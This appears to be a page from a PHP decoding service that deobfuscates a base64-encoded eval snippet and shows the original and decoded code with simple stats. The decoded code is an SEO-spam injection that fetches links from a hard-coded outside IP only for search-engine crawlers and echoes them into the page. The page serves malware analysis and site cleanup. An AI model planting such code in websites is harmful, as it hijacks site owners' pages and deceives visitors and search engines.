Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(base64_decode("aWYgKHByZWdfbWF0Y2goJy9saXZlfG1zbnx5YWhvb3xHb29nbGV8YXNrfGFvbHxib3R8Z2..

Decoded Output download

if (preg_match('/live|msn|yahoo|Google|ask|aol|bot|google/', $_SERVER['HTTP_USER_AGENT'])) { 
$con = @file_get_contents("http://209.160.33.108/links3.php?host=".$_SERVER['HTTP_HOST']);
echo $con;
}

Did this file decode correctly?

Original Code

eval(base64_decode("aWYgKHByZWdfbWF0Y2goJy9saXZlfG1zbnx5YWhvb3xHb29nbGV8YXNrfGFvbHxib3R8Z29vZ2xlLycsICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkpIHsgCiRjb24gPSBAZmlsZV9nZXRfY29ud
GVudHMoImh0dHA6Ly8yMDkuMTYwLjMzLjEwOC9saW5rczMucGhwP2hvc3Q9Ii4kX1NFUlZFUlsnSFRUUF9IT1NUJ10pOwplY2hvICRjb247Cn0="));

Function Calls

base64_decode 1

Variables

None

Stats

MD5 e9b019b8aaf3b65a260b2719b7e76e8a
Eval Count 1
Decode Time 97 ms